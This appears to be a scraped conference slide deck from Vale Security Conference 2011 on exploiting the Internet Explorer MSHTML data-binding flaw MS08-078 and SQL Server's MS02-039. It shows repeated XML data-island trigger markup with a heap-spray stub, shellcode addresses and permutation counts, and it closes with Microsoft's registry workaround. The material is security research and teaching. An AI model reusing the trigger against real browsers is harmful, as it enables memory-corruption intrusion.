memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::RemoveBinding DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 _MemFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 HeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlFreeHeap DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlpLowFragHeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplAry::Delete DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::Detach DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t 0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t DATAFLD 0a0a0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATAFLD 0x0a0a0a0a Exploitation shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Approach Unconditional Vulnerability Complete (YES) Incomplete (NO) Vulnerable Documentation? Document Alternatives? Ecosystem Reverse Reversing? Alternatives? Alternatives Engineer Obfuscation Exploitation Arbitrary code Alternatives Detection Attack detection Permutation
POPed MS02-039 • SQL Request: • JUMP: – CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and forward to REL8. • SQL INSTANCENAME: – There are 115 possible values to REL8. – ASCII hexa values from 0x01 to 0xff, except: – 115 permutations. 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c. – 24,000 permutations. • Writable address and memory alignment: – There are 26,758 new writable addresses within • Return address: SQLSORT.DLL (Microsoft SQL Server 2000 – Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable case the ESP register. addresses if do not mind making it hardcoded. – There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk. 2000 SP0/SP1/SP2). There are much more return – 26,758 permutations. addresses if do not mind making it hardcoded. – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment: Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff. and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities. 2007). – 29,210 permutations. – 4 permutations.
POPed MS08-078
POPed MS08-078
POPed MS08-078 CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
POPed MS08-078 CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
POPed MS08-078 • XML Data Island: • Data Consumer (HTML elements): – There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable HTML document or overloading the HTML HTML elements available, but only five (5) <SCRIPT> element. Unfortunately, the HTML elements are useful. <SCRIPT> element is useless. – The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does • Data Source Object (DSO): not have to be the same HTML element to do so – The HTML <XML> element holds a reference – it can be any mixed HTML element. to a XML DSO, but a XML DSO can also be a – 25 permutations. reference used by another HTML element: • <OBJECT>. • Return address: – The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the to reference: XML DSO or Tabular Data XML DSO handles the return address, and can Control (TDC). use “.NET DLL” technique by Mark Dowd and – 4 permutations. Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008). • Reference: – There are, at least, four (4) new possible return – Characters like “<” and “&” are illegal in <XML> addresses. element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). – 4 permutations. But the <XML> element can be also defined as “&lt;” instead of “<”. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations.
POPed MS08-078 • XML Data Island: • Data Consumer (HTML elements): – There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable HTML document or overloading the HTML HTML elements available, but only five (5) <SCRIPT> element. Unfortunately, the HTML elements are useful. <SCRIPT> element is useless. – The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does • Data Source Object (DSO): not have to be the same HTML element to do so – The HTML <XML> element holds a reference – it can be any mixed HTML element. to a XML DSO, but a XML DSO can also be a – 25 permutations. reference used by another HTML element: • <OBJECT>. • Return address: – The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the to reference: XML DSO or Tabular Data XML DSO handles the return address, and can Control (TDC). use “.NET DLL” technique by Mark Dowd and – 4 permutations. Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008). • Reference: – There are, at least, four (4) new possible return – Characters like “<” and “&” are illegal in <XML> addresses. element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). – 4 permutations. But the <XML> element can be also defined as “&lt;” instead of “<”. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations.
POPed MS08-078 • Workarounds for Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844 … – Disable XML Island functionality • Create a backup copy of the registry keys by using the following command from an elevated command prompt: … • Next, save the following to a file with a .REG extension, such as Disable_XML_Island.reg: Windows Registry Editor Version 5.00 [-HKEY_CLASSES_ROOTCLSID{379E501F-B231-11D1-ADC1-00805FC752D8}] • Run Disable_XML_Island.reg with the following command from an elevated command prompt: Regedit.exe /s Disable_XML_Island.reg 550DDA30-0541-11D2-9CA9-0060B0EC3D39 (XML Data Source Object 1.0) F5078F1F-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 2.6) F5078F39-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 3.0) F6D90F14-9C73-11D3-B32E-00C04F990BB4 (XML Data Source Object 3.0) 333C7BC4-460F-11D0-BC04-0080C7055A83 (Tabular Data Control)
Demonstration DEMONSTRATION [Play Video]
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson Brito

Recommended

Permutation Oriented Programming
Permutation Oriented ProgrammingPermutation Oriented Programming
Permutation Oriented ProgrammingNelson Brito
 
Doten apt presentaiton (2)
Doten apt presentaiton (2)Doten apt presentaiton (2)
Doten apt presentaiton (2)Jeff Green
 
Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Toshiharu Harada, Ph.D
 
Top risks in using NIPS - Brighttalk - July 2010
Top risks in using NIPS - Brighttalk - July 2010Top risks in using NIPS - Brighttalk - July 2010
Top risks in using NIPS - Brighttalk - July 2010EQS Group
 
Proposal defense presentation
Proposal defense presentationProposal defense presentation
Proposal defense presentationRuchika Mehresh
 
Advanced Persistent Threats Cutting Through The Hype
Advanced Persistent Threats Cutting Through The HypeAdvanced Persistent Threats Cutting Through The Hype
Advanced Persistent Threats Cutting Through The HypeSymantec
 
Introduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsIntroduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsAj MaChInE
 
[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware DetectionAj MaChInE
 

Recommended

Permutation Oriented Programming
Permutation Oriented ProgrammingPermutation Oriented Programming
Permutation Oriented ProgrammingNelson Brito
 
Doten apt presentaiton (2)
Doten apt presentaiton (2)Doten apt presentaiton (2)
Doten apt presentaiton (2)Jeff Green
 
Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Toshiharu Harada, Ph.D
 
Top risks in using NIPS - Brighttalk - July 2010
Top risks in using NIPS - Brighttalk - July 2010Top risks in using NIPS - Brighttalk - July 2010
Top risks in using NIPS - Brighttalk - July 2010EQS Group
 
Proposal defense presentation
Proposal defense presentationProposal defense presentation
Proposal defense presentationRuchika Mehresh
 
Advanced Persistent Threats Cutting Through The Hype
Advanced Persistent Threats Cutting Through The HypeAdvanced Persistent Threats Cutting Through The Hype
Advanced Persistent Threats Cutting Through The HypeSymantec
 
Introduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsIntroduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsAj MaChInE
 
[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware DetectionAj MaChInE
 
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson BritoSegInfo
 
[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®Nelson Brito
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersFelipe Prado
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityClaus Cramon Houmann
 
Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015Claus Cramon Houmann
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Claus Cramon Houmann
 
Truth and Consequences
Truth and ConsequencesTruth and Consequences
Truth and ConsequencesMohammed Almeshekah
 
Vulnerability Management In An Application Security World
Vulnerability Management In An Application Security WorldVulnerability Management In An Application Security World
Vulnerability Management In An Application Security WorldDenim Group
 
Eirtight writing secure code
Eirtight writing secure codeEirtight writing secure code
Eirtight writing secure codeKieran Dundon
 
Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!Nelson Brito
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented DefenceSensePost
 
How to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOpsHow to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOpsZane Lackey
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacksdkaya
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Claus Cramon Houmann
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
Metasploit
MetasploitMetasploit
MetasploitParth Sahu
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...Marcin Ludwiszewski
 
Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2Don Kim
 
Application security in a hurry webinar
Application security in a hurry webinarApplication security in a hurry webinar
Application security in a hurry webinarkdinerman
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
 
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)
Vale Security Conference - 2011 - 17 - Rodrigo Rubira Branco (BSDaemon)Vale Security Conference
 
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...
Vale Security Conference - 2011 - 11 - Fernando Mercês [Octane Labs] [Coding ...Vale Security Conference
 

More Related Content

Similar to Vale Security Conference - 2011 - 13 - Nelson Brito

"ENG++: Permutation Oriented Programming" por Nelson Brito
